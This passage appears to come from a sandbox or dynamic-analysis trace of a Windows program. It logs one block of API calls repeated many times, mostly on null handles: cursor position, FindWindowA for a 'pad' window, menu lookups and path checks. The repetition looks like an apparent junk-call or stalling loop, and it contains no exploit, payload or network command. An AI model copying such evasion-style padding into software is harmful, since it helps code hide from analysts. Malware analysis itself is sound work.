lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.514] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.514] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.514] GetMenu (hWnd=0x0) returned 0x0 [0027.514] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.514] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.514] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.514] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.514] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.514] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.514] GetStockObject (i=6) returned 0x1b00018 [0027.514] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.514] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.514] PathFileExistsW (pszPath=0x0) returned 0 [0027.514] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.514] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.514] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.514] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.514] GetMenu (hWnd=0x0) returned 0x0 [0027.514] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x332) returned -1 [0027.514] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.514] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.514] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.514] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.514] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.514] GetStockObject (i=6) returned 0x1b00018 [0027.514] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.514] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.515] PathFileExistsW (pszPath=0x0) returned 0 [0027.515] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.515] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.515] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.515] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.515] GetMenu (hWnd=0x0) returned 0x0 [0027.515] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x218) returned -1 [0027.515] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.515] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.515] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.515] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.515] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.515] GetStockObject (i=6) returned 0x1b00018 [0027.515] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.515] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.515] PathFileExistsW (pszPath=0x0) returned 0 [0027.515] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.515] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.515] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.515] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.515] GetMenu (hWnd=0x0) returned 0x0 [0027.515] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.515] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.515] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.515] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.515] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.515] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.515] GetStockObject (i=6) returned 0x1b00018 [0027.515] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.515] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.515] PathFileExistsW (pszPath=0x0) returned 0 [0027.515] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.515] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.516] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.516] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.516] GetMenu (hWnd=0x0) returned 0x0 [0027.516] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x334) returned -1 [0027.516] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.516] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.516] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.516] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.516] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.516] GetStockObject (i=6) returned 0x1b00018 [0027.516] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.516] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.516] PathFileExistsW (pszPath=0x0) returned 0 [0027.516] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.516] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.516] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.516] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.516] GetMenu (hWnd=0x0) returned 0x0 [0027.516] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.516] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.516] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.516] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.516] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.516] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.516] GetStockObject (i=6) returned 0x1b00018 [0027.516] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.516] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.516] PathFileExistsW (pszPath=0x0) returned 0 [0027.516] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.516] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.516] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.516] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.516] GetMenu (hWnd=0x0) returned 0x0 [0027.516] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x334) returned -1 [0027.517] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.517] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.517] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.517] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.517] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.517] GetStockObject (i=6) returned 0x1b00018 [0027.517] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.517] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.517] PathFileExistsW (pszPath=0x0) returned 0 [0027.517] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.517] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.517] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.517] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.517] GetMenu (hWnd=0x0) returned 0x0 [0027.517] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x59e) returned -1 [0027.517] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.517] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.517] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.517] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.517] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.517] GetStockObject (i=6) returned 0x1b00018 [0027.517] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.517] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.517] PathFileExistsW (pszPath=0x0) returned 0 [0027.517] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.517] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.517] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.517] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.517] GetMenu (hWnd=0x0) returned 0x0 [0027.517] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.517] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.517] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.517] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.518] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.518] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.518] GetStockObject (i=6) returned 0x1b00018 [0027.518] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.518] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.518] PathFileExistsW (pszPath=0x0) returned 0 [0027.518] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.518] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.518] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.518] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.518] GetMenu (hWnd=0x0) returned 0x0 [0027.518] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x334) returned -1 [0027.518] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.518] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.518] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.518] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.518] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.518] GetStockObject (i=6) returned 0x1b00018 [0027.518] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.518] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.518] PathFileExistsW (pszPath=0x0) returned 0 [0027.518] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.518] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.518] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.518] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.518] GetMenu (hWnd=0x0) returned 0x0 [0027.518] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.518] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.518] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.518] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.518] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.518] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.518] GetStockObject (i=6) returned 0x1b00018 [0027.519] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.519] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.519] PathFileExistsW (pszPath=0x0) returned 0 [0027.519] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.519] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.519] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.519] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.519] GetMenu (hWnd=0x0) returned 0x0 [0027.519] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x335) returned -1 [0027.519] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.519] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.519] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.519] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.519] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.519] GetStockObject (i=6) returned 0x1b00018 [0027.519] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.519] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.519] PathFileExistsW (pszPath=0x0) returned 0 [0027.519] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.519] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.519] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.519] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.519] GetMenu (hWnd=0x0) returned 0x0 [0027.519] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x31e) returned -1 [0027.519] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.519] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.519] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.519] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.519] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.519] GetStockObject (i=6) returned 0x1b00018 [0027.519] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.519] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.519] PathFileExistsW (pszPath=0x0) returned 0 [0027.519] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.520] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.520] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.520] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.520] GetMenu (hWnd=0x0) returned 0x0 [0027.520] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.520] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.520] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.520] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.520] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.520] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.520] GetStockObject (i=6) returned 0x1b00018 [0027.520] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.520] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.520] PathFileExistsW (pszPath=0x0) returned 0 [0027.520] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.520] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.520] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.520] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.520] GetMenu (hWnd=0x0) returned 0x0 [0027.520] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x335) returned -1 [0027.520] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.520] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.520] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.520] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.520] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.520] GetStockObject (i=6) returned 0x1b00018 [0027.520] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.520] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.520] PathFileExistsW (pszPath=0x0) returned 0 [0027.520] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.520] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.520] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.520] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.520] GetMenu (hWnd=0x0) returned 0x0 [0027.521] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.521] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.521] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.521] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.521] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.521] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.521] GetStockObject (i=6) returned 0x1b00018 [0027.521] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.521] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.521] PathFileExistsW (pszPath=0x0) returned 0 [0027.521] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.521] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.521] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.521] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.521] GetMenu (hWnd=0x0) returned 0x0 [0027.521] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x332) returned -1 [0027.521] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.521] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.521] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.521] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.521] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.521] GetStockObject (i=6) returned 0x1b00018 [0027.521] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.521] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.521] PathFileExistsW (pszPath=0x0) returned 0 [0027.521] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.521] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.521] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.521] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.521] GetMenu (hWnd=0x0) returned 0x0 [0027.521] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x234) returned -1 [0027.521] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.521] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.522] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.522] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.522] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.522] GetStockObject (i=6) returned 0x1b00018 [0027.522] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.522] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.522] PathFileExistsW (pszPath=0x0) returned 0 [0027.522] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.522] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.522] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.522] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.522] GetMenu (hWnd=0x0) returned 0x0 [0027.522] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.522] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.522] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.522] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.522] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.522] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.522] GetStockObject (i=6) returned 0x1b00018 [0027.522] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.522] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.522] PathFileExistsW (pszPath=0x0) returned 0 [0027.522] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.522] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.522] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.522] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.522] GetMenu (hWnd=0x0) returned 0x0 [0027.522] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x335) returned -1 [0027.522] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.522] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.522] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.522] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.522] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.522] GetStockObject (i=6) returned 0x1b00018 [0027.523] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.523] PathAppendA (in: pszPath=0x0, pMore=0x0 | 